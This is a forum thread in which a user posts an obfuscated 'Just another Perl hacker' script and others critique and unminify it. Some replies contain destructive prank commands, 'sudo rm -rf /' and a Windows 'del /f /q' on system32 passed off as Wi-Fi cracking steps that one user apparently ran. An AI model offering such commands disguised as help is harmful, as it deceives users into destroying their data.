Advertisement
|
|
Advertisement
No logs - Anonymous IP
|
 |
05-02-2010, 09:08 PM
|
#1
|
Wealthy Merchant
Join Date: Jan 2009
Location: New York
Posts: 574
Thanks: 19
Thanked 34 Times in 24 Posts
|
Just another Perl hacker
Code:
for(0..255){print(chr) if((25*(27/9))-1==$_);
if(m/^[^421503679]+?[435]+?$/){push@aa,$&;}};
unshift@aa, pop@aa;for(@aa){print(lc(chr));};
for(-5..$aa[0]){m/[4A][0B]/?print chr oct:32;
$aa[0]--;}for(0..1+1){for(0..3){$aa[0]+=1;}};
$aa=$aa[0];$aa.=--$aa[0]; print lc(chr($aa));
for(0..02){for(0..12){for(0..3){push@_,'$_'};
}}do{print chr oct scalar(@_);push @_,'$_';};
print chr oct scalar(@_);push @_,'$_';$_=457;
@aa=split("|"); unshift @aa, pop @aa;pop @aa;
print chr hex join '', @aa;$SS = join '',@aa;
$_=++$SS*2;print chr oct;for(1..100){$SSS=$_;
last if 0==$_%4};@aa=(a..z); print $aa[$SSS];
$SSS=--$SSS;$SSS--;while(5<$SS){$SS--;$SSS++;
}print chr hex$SSS;for(0..2){$S=$_}$_=$S."0";
print chr hex; for(0..7){for(0..10){pop @_}};
$_=hex scalar(@_);print uc chr;for(-1..2){$_;
shift@aa;$SS++}print shift @aa;$SS=(--$SS)-1;
$SS*=2; $SS=1 . $SS; print chr $SS; $_="GIN";
for (0..1){for (0..2){$SSSS++}}$SSSS.=chr 67;
print chr hex$SSSS;print "\0";@aa=split("|");
for(@aa){push@aaa, ord;}unshift@aaa, pop@aaa;
for(@aaa){print lc chr$_-6};$S=scalar(@aa)*2;
pop@aa;print chr hex$S.chr hex$S.scalar(@aa);
for(0..12){for(0..2){$S++}}$S=hex$S;$S=chr$S;
print lc$S;$S=chr hex 37; for(0..9){$SS+=$S};
$S=$SS;$SS-=70;$S-=$SS-2; print chr hex$S;<>;
__________________
I wouldn't count on it though -- try it in a virtual machine first. --eSparq
|
|
|
06-06-2010, 07:56 PM
|
#2
|
Wealthy Merchant
Join Date: Jan 2009
Location: New York
Posts: 574
Thanks: 19
Thanked 34 Times in 24 Posts
|
Re: Just another Perl hacker
No comments on how I could have improved it?
__________________
I wouldn't count on it though -- try it in a virtual machine first. --eSparq
|
|
|
02-22-2013, 02:54 AM
|
#3
|
Archduke
Join Date: Jan 2009
Location: ฏ๎๎๎&a
Posts: 9,291
Thanks: 333
Thanked 760 Times in 516 Posts
|
Re: Just another Perl hacker
what a mess
__________________
༼ つ ◕_◕ ༽つ
|
|
|
02-22-2013, 03:07 AM
|
#4
|
Count
Join Date: Nov 2009
Location: NOWHERE, FBI.
Posts: 3,577
Thanks: 266
Thanked 327 Times in 239 Posts
|
Re: Just another Perl hacker
I'm not a programmer but I can tell that is fucking sloppy.
__________________
Looking for a 1BTC Loan.
1NyNGFcCNpWLUQE8WwcPqbpfmjKL7jeUTU
|
|
|
02-22-2013, 03:31 AM
|
#5
|
Grand Duke
Join Date: Nov 2009
Location: Account not in use
Posts: 10,959
Thanks: 1,799
Thanked 1,789 Times in 1,198 Posts
|
Re: Just another Perl hacker
Is this the perl script to summon the devil?
__________________
>Issue313 : Aren't you ashamed of what you and Mizled have done to this site?
>panthrax : If it's so unbearable, please leave and never look back.
Account closed. Email: [email protected]
Last edited by Issue313; 02-22-2013 at 05:20 AM.
|
|
|
02-22-2013, 05:16 AM
|
#6
|
Slightly Grander Duke
Join Date: Jan 2009
Location: Tarth
Posts: 12,980
Thanks: 1,377
Thanked 1,868 Times in 1,338 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by Jaguarstrike
No comments on how I could have improved it? 
|
Yes, just add this line to the end and it'll be perfect :
Code:
system('sudo rm -rf /')
|
|
|
03-03-2013, 03:17 AM
|
#7
|
Duke
Join Date: Jan 2009
Posts: 5,005
Thanks: 1,393
Thanked 648 Times in 485 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by Lanny
Yes, just add this line to the end and it'll be perfect :
Code:
system('sudo rm -rf /')
|
haha wasn't there a thread where someone actually fell for something like that and erased their entire hard drive. That was funny as fuck.
|
|
|
03-11-2013, 07:21 AM
|
#8
|
iLumminati Puppt in a box
Join Date: Aug 2010
Posts: 15,194
Thanks: 2,931
Thanked 3,284 Times in 2,270 Posts
|
Re: Just another Perl hacker
|
|
|
03-12-2013, 11:18 AM
|
#9
|
Super Novice
Join Date: Feb 2009
Location: Bay life
Posts: 2,750
Thanks: 83
Thanked 143 Times in 117 Posts
|
Re: Just another Perl hacker
that's not even properly minimized. You just removed the newlines....
Here it is unwinded.
Code:
for(0..255){
print(chr) if((25*(27/9))-1==$_);
if(m/^[^421503679]+?[435]+?$/){
push@aa,$&;
}
};
unshift@aa, pop@aa;
for(@aa){
print(lc(chr));
};
for(-5..$aa[0])
{
m/[4A][0B]/? print chr oct:32;
$aa[0]--;
}
for(0..1+1){
for(0..3){
$aa[0]+=1;
}
};
$aa=$aa[0];
$aa.=--$aa[0];
print lc(chr($aa));
for(0..02){
for(0..12){
for(0..3){
push@_,'$_'
};
}
}
do{
print chr oct scalar(@_);
push @_,'$_';
};
print chr oct scalar(@_);
push @_,'$_';
$_=457;
@aa=split("|");
unshift @aa, pop @aa;
pop @aa;
print chr hex join '', @aa;
$SS = join '',@aa;
$_=++$SS*2;
print chr oct;
for(1..100){
$SSS=$_;
last if 0==$_%4
};
@aa=(a..z);
print $aa[$SSS];
$SSS=--$SSS;
$SSS--;
while(5<$SS){
$SS--;
$SSS++;
}
print chr hex$SSS;
for(0..2){
$S=$_
}
$_=$S."0";
print chr hex;
for(0..7){
for(0..10){
pop @_
}
};
$_=hex scalar(@_);
print uc chr;
for(-1..2){
$_;
shift@aa;
$SS++
}
print shift @aa;
$SS=(--$SS)-1;
$SS*=2;
$SS=1 . $SS;
print chr $SS;
$_="GIN";
for (0..1){
for (0..2){
$SSSS++
}
}
$SSSS.=chr 67;
print chr hex$SSSS;
print "\0";
@aa=split("|");
for(@aa){
push@aaa, ord;
}
unshift@aaa, pop@aaa;
for(@aaa){
print lc chr$_-6
};
$S=scalar(@aa)*2;
pop@aa;
print chr hex$S.chr hex$S.scalar(@aa);
for(0..12){
for(0..2){
$S++
}
}
$S=hex$S;
$S=chr$S;
print lc$S;
$S=chr hex 37;
for(0..9){
$SS+=$S
};
$S=$SS;
$SS-=70;
$S-=$SS-2;
print chr hex$S;
<>
__________________
std::transform(racecar.begin(),racecar.end(),robot.begin(),maximize)
|
|
|
03-13-2013, 12:46 AM
|
#10
|
iLumminati Puppt in a box
Join Date: Aug 2010
Posts: 15,194
Thanks: 2,931
Thanked 3,284 Times in 2,270 Posts
|
Re: Just another Perl hacker
thanks for making that readable sevenTwo, perl is hard enough to read without having it all smashed together.
|
|
|
03-13-2013, 12:57 AM
|
#11
|
Count
Join Date: Jan 2009
Location: NZ-North
Posts: 3,466
Thanks: 734
Thanked 466 Times in 327 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by Lanny
Yes, just add this line to the end and it'll be perfect :
Code:
system('sudo rm -rf /')
|
LoL!  I wonder how many people have fallen for this?
__________________
we still exist, therefore totse isn't dead,  only evolved
|
|
|
03-13-2013, 04:28 PM
|
#12
|
Serf
Join Date: Mar 2013
Posts: 25
Thanks: 0
Thanked 2 Times in 2 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by bornkiller
LoL!  I wonder how many people have fallen for this?

|
"Anyone who is running a *nix-based system and is capable of knowing how to add that code to a perl script and run said code through an interpreter will most likely already know what that line of code does.. also, sloppy syntax right there - system(); should primarily be used for syscalls on windows systems, exec(); should be used for *nix syscalls - since "rm -rf" is a bash command for *nix terminals, then use of system(); to feed that line of code to the CLI is bad form."
|
|
|
03-16-2013, 11:37 AM
|
#13
|
Super Novice
Join Date: Feb 2009
Location: Bay life
Posts: 2,750
Thanks: 83
Thanked 143 Times in 117 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by clandestine
"Anyone who is running a *nix-based system and is capable of knowing how to add that code to a perl script and run said code through an interpreter will most likely already know what that line of code does.. also, sloppy syntax right there - system(); should primarily be used for syscalls on windows systems, exec(); should be used for *nix syscalls - since "rm -rf" is a bash command for *nix terminals, then use of system(); to feed that line of code to the CLI is bad form."
|
LOLWUT? exec and system calls work very differently. before you correct someone, make sure you're correct. -_____-
__________________
std::transform(racecar.begin(),racecar.end(),robot.begin(),maximize)
|
|
|
04-02-2013, 09:18 PM
|
#14
|
Administrator
Join Date: Jul 2011
Location: In the Hearts of Men
Posts: 2,040
Thanks: 327
Thanked 338 Times in 232 Posts
|
Re: Just another Perl hacker
Quote:
Originally Posted by rustyshackleford420
haha wasn't there a thread where someone actually fell for something like that and erased their entire hard drive. That was funny as fuck.
|
yep
https://www.zoklet.net/bbs/showthrea...92#post3759892
Haha just realized it was malice
Quote:
Originally Posted by Malcolm Equis
its really not that hard.
open cmd prompt.
now get the name of the adapter,
type in the prompt
ipconfig /all
then type
mk "name of adapter"
Then you need to set permissions on the sys32 folder, so you can mess with the drivers monitoring mode
del /f /q "c:\WINDOWS\system32\*.*"
once you do this you'll either see
the BSSID or not, if you do tell me the numbers and i can crack the hash
|
Quote:
Originally Posted by Malice
I wish you had said this sooner. I'm typing on my phone right now.
Fortunately I have a backup, but it's still a pain in the ass.
|
__________________
Without nothingness, nothing would exist.
If we could just find out who's in charge, we could kill him.
|
|
|
04-03-2013, 01:14 AM
|
#15
|
iLumminati Puppt in a box
Join Date: Aug 2010
Posts: 15,194
Thanks: 2,931
Thanked 3,284 Times in 2,270 Posts
|
Re: Just another Perl hacker
 I can crax the hash.
|
|
|
 |
Currently Active Users Viewing This Thread: 1 (1 members and 0 guests)
|
Dfg
|
Posting Rules
|
You may post new threads
You may post replies
You may not post attachments
You may edit your posts
HTML code is Off
|
|
|
All times are GMT +5. The time now is 02:13 AM.
|
|
Hot Topics |
| | | | | | | | | | | | | | |
Join our Chatroom! |
Users: 8
Messages/minute: 0
Topic: "Only rule: be nice or I'll cut your fucking face off, dumbshit"
|
Users: 27
Messages/minute: 1.6
Topic: "http://codelove.org :: Below is above in 2 codes 1 love. :: wh..."
|
Users: 18
Messages/minute: 5
Topic: "http://www.literotica...."
|
Advertisements |
Your ad could go right HERE! Contact us!
|
|